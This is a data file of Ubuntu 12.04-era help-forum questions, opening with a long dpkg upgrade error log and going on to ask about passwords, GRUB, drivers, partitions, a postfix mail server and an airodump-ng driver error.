pre-removal script returned error exit status 1 no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 39 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace python-apport 2.0.1-0ubuntu7 ( using ... /python-apport_2.0.1-0ubuntu9_all.deb ) ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error processing /var/cache/apt/archives/python-apport_2.0.1-0ubuntu9_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 39 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace apport 2.0.1-0ubuntu7 ( using ... /apport_2.0.1-0ubuntu9_all.deb ) ... apport stop/waiting traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error processing /var/cache/apt/archives/apport_2.0.1-0ubuntu9_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already apport start/running traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 39 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace gnome-orca 3.4.1-0ubuntu0.1 ( using ... /gnome-orca_3.4.2-0ubuntu0.1_all.deb ) ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error processing /var/cache/apt/archives/gnome-orca_3.4.2-0ubuntu0.1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 39 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace python-piston-mini-client 0.7.2-0ubuntu1 ( using ... /python-piston-mini-client_0.7.2+bzr57-0ubuntu1_all.deb ) ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error processing /var/cache/apt/archives/python-piston-mini-client_0.7.2+bzr57-0ubuntu1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 39 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace oneconf 0.2.8 ( using ... /oneconf_0.2.8.1_all.deb ) ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error processing /var/cache/apt/archives/oneconf_0.2.8.1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 39 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace software-center 5.2.2 ( using ... /software-center_5.2.2.2_all.deb ) ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... traceback ( most recent call last ) : file `` /usr/bin/pyclean '' , line 33 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error processing /var/cache/apt/archives/software-center_5.2.2.2_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 39 , in < module > from debpython.namespace import add_namespace_files valueerror : bad marshal data ( unknown type code ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace libglade2-0 1:2.6.4-1ubuntu1 ( using ... /libglade2-0_1 % % 3a2.6.4-1ubuntu1.1_amd64.deb ) ... unpacking replacement libglade2-0 ... preparing to replace libv4l-0 0.8.6-1ubuntu1 ( using ... /libv4l-0_0.8.6-1ubuntu2_amd64.deb ) ... de-configuring libv4l-0 : i386 ... unpacking replacement libv4l-0 ... preparing to replace libv4l-0 : i386 0.8.6-1ubuntu1 ( using ... /libv4l-0_0.8.6-1ubuntu2_i386.deb ) ... unpacking replacement libv4l-0 : i386 ... preparing to replace libv4lconvert0 : i386 0.8.6-1ubuntu1 ( using ... /libv4lconvert0_0.8.6-1ubuntu2_i386.deb ) ... de-configuring libv4lconvert0 ... unpacking replacement libv4lconvert0 : i386 ... preparing to replace libv4lconvert0 0.8.6-1ubuntu1 ( using ... /libv4lconvert0_0.8.6-1ubuntu2_amd64.deb ) ... unpacking replacement libv4lconvert0 ... errors were encountered while processing : /var/cache/apt/archives/python-problem-report_2.0.1-0ubuntu9_all.deb /var/cache/apt/archives/python-apport_2.0.1-0ubuntu9_all.deb /var/cache/apt/archives/apport_2.0.1-0ubuntu9_all.deb /var/cache/apt/archives/gnome-orca_3.4.2-0ubuntu0.1_all.deb /var/cache/apt/archives/python-piston-mini-client_0.7.2+bzr57-0ubuntu1_all.deb /var/cache/apt/archives/oneconf_0.2.8.1_all.deb /var/cache/apt/archives/software-center_5.2.2.2_all.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up libglade2-0 ( 1:2.6.4-1ubuntu1.1 ) ... dpkg : error processing gnome-orca ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . dpkg : error processing python-problem-report ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . setting up libv4lconvert0 ( 0.8.6-1ubuntu2 ) ... setting up libv4lconvert0 : i386 ( 0.8.6-1ubuntu2 ) ... dpkg : error processing python-piston-mini-client ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . setting up libv4l-0 ( 0.8.6-1ubuntu2 ) ... setting up libv4l-0 : i386 ( 0.8.6-1ubuntu2 ) ... dpkg : dependency problems prevent configuration of python-apport : python-apport depends on python-problem-report ( > = 0.94 ) ; however : package python-problem-report is not configured yet . dpkg : error processing python-apport ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of software-center : software-center depends on python-piston-mini-client ( > = 0.1+bzr29 ) ; however : package python-piston-mini-client is not configured yet . dpkg : error processing software-center ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of oneconf : oneconf depends on python-piston-mini-client ( > = 0.3+bzr32-0ubuntu1 ) ; however : package python-piston-mini-client is not configured yet . dpkg : error processing oneconf ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apport : apport depends on python-apport ( > = 2.0.1-0ubuntu7 ) ; however : package python-apport is not configured yet . dpkg : error processing apport ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... ldconfig deferred processing now taking place this has been going on for two weeks now and i can not get any updates . any help would be great .
148384	password changed , but only accepts old password at login	yesterday evening i changed my password , using : systems settings > > user accounts but , this morning my new password is not accepted . in trying other solutions , i tried my old password which still allowed me to login . please can anyone give me reason why this happen , and how i can stop this happening ?
148385	wordpress restored from backup asking for ftp	i backed up my /var/www/wordpress folder to my external harddisk and restored it back . now when i add a new plugin i am asked for ftp access to my localhost . i wonder why ? as far as i could go /var/www/wordpress and its subfolders/files are own'ed by root . i have logged in to my wordpress as admin root . i dont know why i need to setup ftpd , but i tried that too . here i am missing something really silly here .
148391	what tools can i use to download videos from youtube and vimeo on ubuntu 12.04 ?	i am using 12.04 lts . can anyone suggest a simple software that can download videos from youtube and vimeo ?
148395	how do i get around administrator priviliges are required for this task when installing real vnc ?	when i try to install real vnc and enter in the registration code i get administrator privileges are required for this task . how do i get around this ? i am the only user on the computer and already tried giving myself all the permissions in users and groups . please help
148397	grub recover command line	recently the service provider link suddenly broke , while i was updating . then suddenly while i was trying to boot , i could not . the message on my screen was grub recover missing , and i had no option but the grub recover command line . i really did not know what to do . so i installed an earlier version of ubuntu 10.04 . it started to boot normally . now my system is back to 12.04 the version i was working with . how does one handle problems like this ?
148406	how do i add links to launcher	i am new to ubuntu ; i 've been using it for a couple hours now , and i encountered one little problem that i was hoping to solve . i got a program on my computer without actually using the software center or packages , it 's just a folder with a executable file in it . so i figured that it 's not a problem and just put the folder in a safe place and created a link to the executable file which i put on the desktop . so here 's the question : how do i get the link into the launcher ?
148408	chameleon effect not working after update	i 've been using ubuntu 12.04 since it came out and so far did n't have any problems with it . but after i updated ( via update manager ) it yesterday , after every reboot , the launcher color defaults to a blue dash , workspace and trash icon and the rest is black . if i set the wallpaper again manually , then it changes color as its supposed to ( chameleon ) . any idea why this is ? its really annoying to change your wallpaper every time you logon just to get the `` normal '' launcher . edit the chameleon effect works perfectly for notifications . only the launcher and dash are not changing the color . thanks .
148414	español/english - trouble downloading / problema descargando adobe-flashplugin_11.2.202.236	me sale esto al actualizar el sistema ( apt-get update upgrade ) , probé usando el comando sudo dpkg -- configure -a como me indica , bajando flash desde la pagina oficial y en todos los intentos me sale mismo , simplemente no pasa de ahí . i just keep getting freeze ups , i mean the computer has about 6 hrs downloading flashplugin . every time i try to update or use dpkg to get flash .
148420	how do i partition an sd drive that is greater than 4gb so that ubuntu runs on 4gb and the rest is used as storage ?	i 've been trying for about a week now to partition my 32gb sd card so 4gb can be used as a ubuntu live and the rest as general storage that can be seen by ubuntu and windows . i 've tried this method : http : //www.pendrivelinux.com/create-a-larger-than-4gb-casper-partition/ everything works up until the start disk creator . my partitions are not visible there even though they are visible on my computer . also i 've attempted with vm player http : //www.howtogeek.com/97177/how-to-put-ubuntu-linux-on-a-usb-thumb-drive-without-the-mess/ if this helps , here is the sd card i 'm using with the usb adapter . http : //www.adorama.com/kgmb10g232gb.html ? utm_term=other & utm_medium=shopping % 20site & utm_campaign=other & utm_source=gbase
148421	how to programmatically edit a file using only terminal ?	i wish to write a shell script whereby i could read the file from command and edit the file without manual intervention ( based on searching some text and replacing it with another ) . i need not use any text editor for this ... .simply text-searching ( like using grep ) and then replacing it with some other text and saving the changes ... .
148425	'activation of wireless network connection failed ' error with a bsnl broadband modem # dna-a211-i	i 'm getting the message 'network connection failed ' frequently when i connect to wifi using 12.04 . i was using the same connection without any problems , in ubuntu 10.04 and windows vista . what might be the reason why my connection is terminating so frequently while using only the ubuntu 12.04 version ? how to resolve this issue ? i have tried connecting to internet using usb ethernet through my mobile phone . then it worked out properly . connection is not getting terminated as with wlan interface . so i think the problem might be with wlan modem . but then , how come wlan works well in windows and older versions of ubuntu . and the problem is for 12.04 alone .
148426	psychonauts , what to do with 'psychonauts-linux-06042012-bin ' ?	psychonauts came in a neat file called psychonauts-linux-06042012-bin . the file system calls it an executable , but i ca n't find a way to execute it . ubuntu suggested using `` pypar2 '' to open it like an archive , which made it into a bunch of .par2 files , but it then could n't find anything else to open those . it seems that other people have been able to start the game , so what should i do differently ?
148433	apt-get take long time to update\upgrade	on my work network any apt-get ( or aptitude ) commands take a very long time , it 's look 's like admins blocked some port for it ( for unknown reason ) . for example sudo apt-get update take like 2 days and all i get - a very long list of responses like get : 36 http : //security.ubuntu.com precise-security/universe amd64 packages [ 11.6 kb ] get : 37 http : //security.ubuntu.com precise-security/universe amd64 packages [ 11.6 kb ] get : 38 http : //security.ubuntu.com precise-security/universe amd64 packages [ 11.6 kb ] get : 39 http : //security.ubuntu.com precise-security/universe amd64 packages [ 11.6 kb ] get : 40 http : //security.ubuntu.com precise-security/universe amd64 packages [ 11.6 kb ] same situation then i try to download software get:1 http : //archive.ubuntu.com/ubuntu/ precise/main dash i386 0.5.7-2ubuntu2 [ 85.8 kb ] get:2 http : //archive.ubuntu.com/ubuntu/ precise/main dash i386 0.5.7-2ubuntu2 [ 85.8 kb ] get:3 http : //archive.ubuntu.com/ubuntu/ precise/main dash i386 0.5.7-2ubuntu2 [ 85.8 kb ] get:4 http : //archive.ubuntu.com/ubuntu/ precise/main dash i386 0.5.7-2ubuntu2 [ 85.8 kb ] get:5 http : //archive.ubuntu.com/ubuntu/ precise/main dash i386 0.5.7-2ubuntu2 [ 85.8 kb ] is there something i can do to change port for apt-get or something else
148434	ubuntu ca n't detect my nvidia graphics card	in system details , i ca n't find information about my graphics card . i have installed graphics driver using additional drivers . my graphics card is nvidia 8400gs desktop version with 512 mb ddr2 memory integrated .
148437	no boot option after installing ubuntu 12.04 inside windows xp and drive h : is also gone	my h : drive is gone . after after installing ubuntu 12.04 inside windows . when i installed ubuntu 12.04 from usb inside windows in drive h : ( dev/sdv7 ) when the installation finished it said to restart , when i restarted i did not see an option to boot ubuntu or windows . when it automatically booted into windows my h : drives is also gone . now how can i dual boot to choose whether to boot ubuntu or windows . it shows nothing when the installation is finished and when i restarted my pc .
148441	why ca n't 12.04 installer see one of my hard drives	i 'm trying to install ubuntu 12.04 32-bit from a usb pen drive . i have two drives , a wd caviar black and a samsung spc250 . at the `` installation type '' stage , it only sees my samsung and the usb pen drive , not the wd . i checked the drive with gparted and everything seems fine . i tried the alternate installer but that does n't work either i tried changing from ide to ahci in the bios and back what can i do now ? 1st picture , g.parted shows wd disk as sda . but ubiquity ca n't see.only my second drive as sdb.even i reserved space as ext4 for installation . 2nd picture , you can see 1tb sda disk . but it unable to mount . i want to install ubuntu to sda disk . thanks for help .
148443	offline installation of addtional drivers , how to determine correct pakage	i have an old system which is not connected to internet . the computer specification as below , intel dual core 3gb ram mobo : asus p5n73- am now if you see the specification of mobo , you can see the chipset is nvidia geforce 7050/nforce 610i and vga card is integrated geforce 7050 gpu . i used to run ubuntu 11.10 on that system and install drivers from addtional drivers . now gave the desktop to my sister , and installed ubuntu 12.04 from a image created by remastersys . i removed all unnecessary softwares , drivers after installation . it is now working fine.unity 3d is running but very slow . so i think i need to install the additional driver . as i told earlier , it is not connected to internet . only thing i can do to download the package from another system and install it there . but i could n't determine which package needs to be downloaded .
148444	gnome shell floating hdd icon	where does the floating hdd icon comes from ? it 's obviously from my external hdd , but i do n't want to have it there . once i click it , it goes away . is there a way not to show it at all ? my current extensions based on advanced settings
148448	cyborg rat 3 mouse requires relog	to begin , i want to make clear that this is different from the other cyborg rat questions . this question is after following the answers.first okay , so since christmas when i got the cyborg rat 3 mouse , using it in ubuntu is a pain . once i sign in , it works for a bit , until i open a window , then clicking does nothing . it still moves , with only the clicking non-functioning . i followed a few guides which suggested editing xorg with the new button map , which worked . however , when i reboot , the same problem persists unless i log off and sign back in . so my question is : what can i do to eliminate the need to sign out and back in for the mouse to work ?
148450	are video and audio codecs legal in ubuntu in the united states ?	in the united states i would like to know if it is legal to use propriety video and audio codecs in ubuntu . specifically i would like to know if i can play mp3 files on ubuntu , and if i can install and use the libx264 library to do video editing and export mp4 files . i went to computex in taiwan today and i went to the ubuntu booth . a person there told me that canonical has paid for the right/license to use proprietary audio and video formats/codecs . is this true ? i asked the person if he could show me anything online that said this and he could not find anything . is there any list of codecs/formats that can be used legally in the united states for the purpose of listening to audio , watching video and audio and video editing ? i want to use openshot to edit some video and export it to mp4 using libx264 but i want to do it legally .
148452	no grub menu after installing ubuntu	i installed ubuntu 12.04 from usb from inside windows . when i restarted the pc there was no grub menu . how to fix this ?
148459	12.04 bcm4312 and aireplay-ng/airodump-ng	first off , i 've read through all of the posts regarding bcm4312 on the forums but have n't been able to get any help . basically i have a dell inspiron 1564 which i 've installed 12.04 on and for the most part everything works fine but now that i 'm trying to use more in depth utilities such as aireplay and airodump i 'm coming across what i believe to be a driver problem that 's not allowing compatibility for these programs . does anyone out there have any suggestions how to resolve this ? this is the error i receive : root @ haxornator : ~/aircrack/aircrack-ng-1.1 # airodump-ng eth2 ioctl ( siocsiwmode ) failed : invalid argument arp linktype is set to 1 ( ethernet ) - expected arphrd_ieee80211 , arphrd_ieee80211_full or arphrd_ieee80211_prism instead . make sure rfmon is enabled : run 'airmon-ng start eth2 < # > ' sysfs injection support was not found either .
148463	mts mblaze modem is not being recognized	when i insert my mts mblaze modem in my system and i try to run it , the mblaze application says that the device is wrong and asks me to insert the proper device . what should i do ?
148464	start application without icon in the launcher	is it possible to launch an application without icon in the launcher ?
148473	why is cat running as a daemon on ubuntu 12.04 ?	/bin/cat appears to be running as a persistent daemon on my 12.04 system . $ ps aux | grep cat detlef 2278 0.0 0.0 8680 352 ? s 06:13 0:00 /bin/cat why does ubuntu 12.04 need cat running as a daemon ? it did n't on my 10.04.4 system .
148474	how do i access my windows partition ?	i have ubuntu 12.04 installed on my hp g62-453 tu laptop . i can not access the contents of my hard disk partition e .
148481	how do i prevent immediate wake up from suspend and/or hibernation ?	for a few days , my ubuntu 12.04 desktop computer has mysteriously been waking up immediately after going to suspend mode . since installation , my ubuntu 12.10 laptop computer has also been resuming immediately after suspend and hibernation . how to prevent those ?
148483	12.04 does n't boot anymore after a power failure	i 'm a windows user and i have no experience with linux and ubuntu . i installed ubuntu 12.04 on my netbook ( asus 1215b ) and everything works fine . yesterday i ran the `` update application '' and updated over 120 `` things '' ( i have no idea what exactly ) . after that i was asked to reboot , and i did . ubuntu starts again and at the load screen with these 5 dots that normally begin to change color , it freezes . after 20 minutes i took out the battery to try another reboot ( yes , not the the best idea ) , and now nothing happens . i boot from the hdd and i get an error bootmgr is missing . iâ have important data on the hard drive . is there an option to get this fixed ? or if not , to at least get the data from the hard drive ? ubuntu 12.04 64-bit edit : it is only ubuntu on this netbook , which uses the whole 500gb hdd as 1 partition . filesystem is ntfs . whole hardware seems okay . the usb drive which i used to instl the os was formated in fat32
148486	dual monitors , screen resolution , xorg.conf.d	i do a lot of rtfm but this one has got me stuck . i have ubuntu studio 12.04 precise pangolin with xfce as its default desktop . my old his ati radeon 9250 graphics card was adding red crud across the screen with the generic driver , but downloading the proprietary `` fglrx '' driver makes it work cleanly . the trouble is the catalyst control centre refuses to recognise my old card so i must do some manual configuring to make sure both the dvi and vga monitors are capable of the correct screen resolution ( both 1280x1024 ) and a dual display . it used to be easier to just edit the existing xorg.conf file and add another resolution and so forth , but now there are automatic xorg.conf.d directories ( more than one ) with scant documentation . creating a generic xorg.conf with a terminal command creates every setting imaginable . what i want to do is create the simplest conf file which just tells the system the following : my vga monitor can do 1280x1024 60hz the two monitors together may be 2560x1024 width the vga monitor on the right i might need to specify xinerama if it 's needed thank you . i do n't think i need to bore you with log files , but please ask for further info . mike
148490	i want my ubuntu on an external display alone ?	i have a toshiba laptop with ubuntu 12.04 on it and i 've connected it to an external display but i do n't want to mirror the displays nor make it stretch on both i just want it show up on my external display only ! ! any help ?
148491	smart gallery extension on libreoffice not working	i 'm trying to install smart gallery extension in libreoffice but i get the following message : ( com.sun.star.registry.cannotregisterimplementationexception { { message= '' '' , context= ( com.star.uno.xinterface ) @ 0 } } does anyone knows how to fix it ?
148492	qjackctl - alsa unknown driver	here 's my problem : i just have installed qjackctl on my ubuntu 12.04 and when i start jack i got this issue : 12:01:22.769 /usr/local/bin/jackd -dalsa -dhw:0 -r44100 -p1024 -n3 -i1 -o2 can not connect to server socket err = aucun fichier ou dossier de ce type can not connect to server socket jack server is not running or can not be started unknown driver `` alsa '' if anyone knows the solution it would help me a lot !
148495	bash error suppresion	i 'm using php script from cli , the script calls exec ( ) few times . there are some minor errors sometimes , which are handled by php script . i 'm suppressing the errors by appending 2 > /dev/null to the end of each command ... is there any way to achieve that without adding the forementioned ?
148500	are there any ui for mame ?	i used to install gxmame for launching the mame games in ubuntu , but after installing ubuntu 12.04 ( 64-bit ) the package does not seem to be available in the software system . i have tried gnome video arcade , but it simply does not seem to work . is there another ui that i can use to launch the mame games ?
148505	what are these unknown partitions i see in gparted ?	there are two partitions in my ubuntu 12.04 setup that do n't mount and are `` unknown '' ; /dev/sda7 and /dev/sda5 : and the properties dialogue : is one supposed to be my swap partition ? i have 8 gb of ram ( so maybe sda7 was swap ) . should i format the partitions to a certain format and somehow mark it as swap ? should i merge the two partitions ( and the 7mb unallocated space ) together ? i recently upgraded from ubuntu 11.10 to 12.04 . any help would be appreciated . thanks .
148506	program to install ubuntu from a usb ?	i want to install ubuntu in my computer from usb ( with out copy ubuntu iso to a dvd ) because in my eeepc i havenâ´t dvd . what program could i use and what are the steps to do it ?
148514	'sdl_openaudio failed : no available audio device ' while starting psychonauts	psychonauts fails to start on ubuntu 12.04 x64 with the error sdl_openaudio failed : no available audio device what do i need to do to start the game ?
148522	can i install ubuntu amd/ati drivers on a live cd/usb ?	the only way i can run ubuntu live cd is to put in i915.modeset=0 xforcevesa . it 's because the open source drivers do n't work on my graphics card . is there a way to download amd drivers and install them on the live cd / usb ? specifics : graphics card : amd radeon hd 6380g laptop : hp pavilion g6-1233sa
148531	how to use find when there are spaces in the directory names ?	i need to find all .nfo files in my media directory so i can use sed to change some parts . the problem is my folders have spaces in the names . find /media/media1/hdtv -name \*.nfo -type f media/media1/hdtv/band of brothers/season 1/ âś the output file wo n't found by a sed command to change the strings i want .
148536	how to enable sigquit core dumps with apport ?	i noticed that on a 12.04 system setting ulimit -c unlimited and sending ctrl+\ does not have the expected result . though the shell prints ^\zsh : quit ( core dumped ) no core dump is written as far as i can tell . the file /proc/sys/kernel/core_pattern contains an apport pipe - thus , it seems that by default apport is now responsible for writing core dumps . the directory /var/crash does not contain a recent core dump for my application . thus my question : is apport ignoring sigquit induced core dumps ? if yes : should n't that be considered a bug ? how can i configure apport such that it does not ignore sigquit ? ( as a workaround setting /proc/sys/kernel/core_pattern to core works as expected , i.e . i get a core dump named core into my cwd after hitting sigquit . )
148540	apt-get install for different python versions	i have ubuntu 10.04 with python2.6 by default . i have installed python2.7 . when i want to install python packages with apt-get python- it gets installed to python2.6 . how can i make it to install to python2.7 , is there any options ? i have considered using easy_install-2.7 but not all packages are supported . for example python-torctl . i am more interested in binding python2.7 with apt-get install .
148541	( initramfs ) unable to find a live medium containing a live file system toshiba	when i try to boot from my usb it says : ( initramfs ) unable to find a live medium containing a live file system i know of lots of questions here about this problem ... i 've tried every solution but nothing worked . i just ask if anyone here who got a toshiba sattelite pro c650 and found the solution , because i simply cant install ubuntu 10.04 because of this : ( ( ( other spec : - i have usb 2.0 - changed all possible settings in bios . ( ahci.. ) - iso is not corrupted ( boot is succesful on my other hp laptop ) thanks . edit : but xubuntu works : /
148545	gnome shell crashes all the time	i 'm so normal shell crashes gnome , i can only move the mouse and i can not do anything else . i have to resort to the blackout . then turn on your computer appears to me that my system has a fault and apparently is in the xorg file .
148548	will ubuntu 12 run on my lenovo z570	i read somewhere that the graphics were sluggy because of graphic card ! specs of my lenovo : graphics : nvidia gt-520m ( 1gb ) intel hd graphics ( 1gb ) pls do tell me !
148550	using headset controls like a smart phone	i have a generic pair of smartphone earphones that have the button ( along with a microphone ) and i would like to use the button as a pause/play key in ubuntu , like i would on an android phones music player . is there a way to enable this headset control in ubuntu ? if the headset controls are a hardware feature of audio jacks used in android phones , the name of that hardware ( audio jack ) would be appreciated .
148554	installingâ ffmpeg , libx264 and libavfilter	i trying to install this following these instructions : sudo apt-get remove ffmpeg x264 libx264-dev sudo apt-get update sudo apt-get install build-essential subversion git-core checkinstall yasm texi2html libfaac-dev libfaad-dev libmp3lame-dev libopencore-amrnb-dev libopencore-amrwb-dev libsdl1.2-dev libx11-dev libxfixes-dev libxvidcore4-dev zlib1g-dev cd mkdir ffmpeg-x264-avfilter cd ffmpeg-x264-avfilter git clone git : //git.videolan.org/x264.git cd x264 ./configure make sudo checkinstall -- pkgname=x264 -- pkgversion `` 1:0.svn`date + % y % m % d`+`git rev-list head -n 1 | head -c 7` '' -- backup=no -- default cd .. svn checkout svn : //svn.ffmpeg.org/soc/libavfilter cd libavfilter ./checkout.sh cd ffmpeg ./configure -- enable-gpl -- enable-version3 -- enable-nonfree -- enable-postproc -- enable-pthreads -- enable-libfaac -- enable-libfaad -- enable-libmp3lame -- enable-libopencore-amrnb -- enable-libopencore-amrwb -- enable-libx264 -- enable-libxvid -- enable-x11grab -- enable-avfilter -- enable-avfilter-lavf make sudo checkinstall -- pkgname=ffmpeg-avfilter -- pkgversion `` 4:0.5+svn`date + % y % m % d` '' -- backup=no -- default i got these errors : unknown option `` -- enable-libfaad '' . unknown option `` -- enable-avfilter-lavf '' . error : libfaac not found whatâ am i doing wrong ?
148555	mail server not working ?	i am trying to setup mail server since a long time but as i am new to linux i have unsuccessfully configured it to the best as i could but now i need assistance . i have installed it using the links below : http : //www.serverubuntu.it/postfix-dovecot-guide https : //help.ubuntu.com/community/mailserver i this to have web console also it should use the domain name as mail.risheetech.com for web console & email address should be something like rishee @ risheetech.com as every one knows it is a big process to setup an mail server , i am not including everything but very small amount of information , but please feel free to ask for any information that you may need to analyze and help me to resolve it . below is the result of nmap : # nmap -ss -o 127.0.0.1 starting nmap 5.21 ( //nmap.org ) at 2012-06-09 17:33 ist nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.000026s latency ) . not shown : 990 closed ports port state service 23/tcp open telnet 53/tcp open domain 80/tcp open http 110/tcp open pop3 143/tcp open imap 631/tcp open ipp 993/tcp open imaps 995/tcp open pop3s 2000/tcp open cisco-sccp 3306/tcp open mysql device type : general purpose running : linux 2.6.x os details : linux 2.6.19 - 2.6.31 network distance : 0 hops os detection performed . please report any incorrect results at //nmap.org/submit/ . nmap done : 1 ip address ( 1 host up ) scanned in 1.67 seconds below is the mail.log file entries . tail -f /var/log/mail.log may 13 13:30:53 risheetech postfix/master [ 9018 ] : warning : /etc/postfix/main.cf : logical line must not start with whitespace : `` smtpd_banner = $ myhostname es ... '' may 13 13:30:53 risheetech postfix/master [ 9018 ] : fatal : /etc/postfix/master.cf : line 120 : bad transport type : -e may 13 13:32:05 risheetech postfix/master [ 9151 ] : fatal : /etc/postfix/master.cf : line 120 : bad transport type : -e may 14 09:54:09 risheetech postfix/master [ 11284 ] : fatal : /etc/postfix/master.cf : line 120 : bad transport type : -e jun 9 17:08:50 risheetech postfix/postfix-script [ 13856 ] : starting the postfix mail system jun 9 17:08:51 risheetech postfix/master [ 13857 ] : fatal : /etc/postfix/master.cf : line 120 : bad transport type : -e jun 9 17:09:01 risheetech postfix/postfix-script [ 13863 ] : error : unknown command : 'restart' jun 9 17:09:01 risheetech postfix/postfix-script [ 13864 ] : fatal : usage : postfix start ( or stop , reload , abort , flush , check , status , set-permissions , upgrade-configuration ) jun 9 17:09:08 risheetech postfix/postfix-script [ 13977 ] : starting the postfix mail system jun 9 17:09:08 risheetech postfix/master [ 13978 ] : fatal : /etc/postfix/master.cf : line 120 : bad transport type : -e let me know what else is required to figure out what is the problem . i know it is very complicated and includes lot of other sub questions in it .
148558	why is my laptop fan running so much ?	i have a dell n5110 laptop and the fan is running quickly and noisily often . i 'm concerned my laptop might be getting damaged . is there any way to identify what is causing this and , if so , how i might fix it safely ?
148559	`` connection error . please try logging in again '' login into last.fm from rhythmbox	so , every time i try to login into last.fm from the plugin in rhythmbox i get the following error : '' connection error . please try logging in again '' it seems normal since i have n't found a way to introduce my credentials . i can not do it from `` edit/plugins/last.fm/preferences '' and if i right click on the link on the library i only get the option to `` refresh profile '' . i 've tried to enable/disable the plugin several times . i can not find the way to enter the credentials either with gconf-editor or dconf-editor . i 'm at a loss . anyone knows the answer to this ?
148566	how to upgrade to 12.04 from 10.10 with a dell ?	i bought dell inspiron n5040 yesterday and it seems to have 32bit ubuntu 10.10 installed . i want to upgrade to 12.04 lts using network installation . note , updater ca n't find 12.04 . furthermore , if i change long term to normal releases then updater can find 11.04 , but it will fail because on an authentication error .
